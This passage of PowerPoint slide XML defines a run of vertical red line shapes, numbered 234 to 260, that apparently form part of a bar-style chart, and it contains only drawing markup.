          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343040" y="5316771"/>
            <a:ext cx="0" cy="673217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="339725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="339689"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="object 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362874" y="5541881"/>
            <a:ext cx="0" cy="445455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="224789">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="224591"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="object 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362874" y="5538907"/>
            <a:ext cx="0" cy="451747"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="227964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="227594"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="object 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4382707" y="5386390"/>
            <a:ext cx="0" cy="601491"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="303530">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="303056"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="object 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4382707" y="5383416"/>
            <a:ext cx="0" cy="606524"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="306069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="306058"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="object 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402935" y="5602972"/>
            <a:ext cx="0" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="194310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="193763"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="object 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402935" y="5599996"/>
            <a:ext cx="0" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="196850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="196765"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="object 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422768" y="5330858"/>
            <a:ext cx="0" cy="656858"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="331469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="331080"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="object 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422768" y="5327883"/>
            <a:ext cx="0" cy="663150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="334644">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="334082"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="object 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442602" y="5597412"/>
            <a:ext cx="0" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="196850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="196568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="object 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442602" y="5594439"/>
            <a:ext cx="0" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="200025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="199570"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="object 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4462434" y="5369729"/>
            <a:ext cx="0" cy="617849"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="311785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="311464"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="object 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4462434" y="5366754"/>
            <a:ext cx="0" cy="624141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="314960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="314467"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="object 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482269" y="5636291"/>
            <a:ext cx="0" cy="351079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="177164">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176949"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="object 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482269" y="5633316"/>
            <a:ext cx="0" cy="357371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="180339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="179951"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="object 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4502101" y="5391944"/>
            <a:ext cx="0" cy="595199"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="300355">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="300254"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="object 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4502101" y="5388968"/>
            <a:ext cx="0" cy="601491"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="303530">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="303257"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="object 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521936" y="5669611"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160135"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="object 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521936" y="5666636"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="163138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="object 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4541768" y="5530775"/>
            <a:ext cx="0" cy="456779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="230505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="230195"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="object 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4541768" y="5527802"/>
            <a:ext cx="0" cy="463070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="233197"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="object 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561602" y="5569647"/>
            <a:ext cx="0" cy="417772"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="210819">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="210579"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="object 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561602" y="5566672"/>
            <a:ext cx="0" cy="424063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="213994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="213582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="object 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581435" y="5453028"/>
            <a:ext cx="0" cy="534798"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269429"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="object 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581435" y="5450053"/>
            <a:ext cx="0" cy="541090"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="273050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="272431"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="object 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601269" y="5580756"/>
            <a:ext cx="0" cy="406445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="205105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204973"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="object 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601269" y="5577783"/>
            <a:ext cx="0" cy="412736"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="208280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="207975"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="object 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621498" y="5547439"/>
            <a:ext cx="0" cy="440422"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="222250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221786"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
